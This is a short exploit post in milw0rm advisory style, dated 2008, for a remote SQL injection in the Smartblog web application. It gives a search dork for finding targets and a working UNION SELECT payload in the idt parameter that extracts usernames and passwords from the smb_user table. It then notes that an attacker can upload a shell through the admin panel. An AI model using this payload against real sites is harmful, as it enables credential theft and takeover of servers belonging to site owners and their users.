################################################### [~] Smartblog remote SQL injection exploit [~] Script download : http://ftp1.toocharger.com/scfQ9NS/smartblog_3868.zip [~] Founder: His0k4 { ALGERIAN HACKER } [~] Greetz : All friends & muslims HaCkErS... [~] Contact: His0k4.hlm[at]gmail.com [~] Dork : Actionnée par smartblog [~] P.O.C : --------------------- http://localhost/[script_path]/index.php?idt={SQL} [~] Exemple : http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user-- --------------------- [~] Note: Admin http://localhost/[script_path]/?page=login.html You can upload a shell from the admin panel --------------------- ############################################### # milw0rm.com [2008-05-03]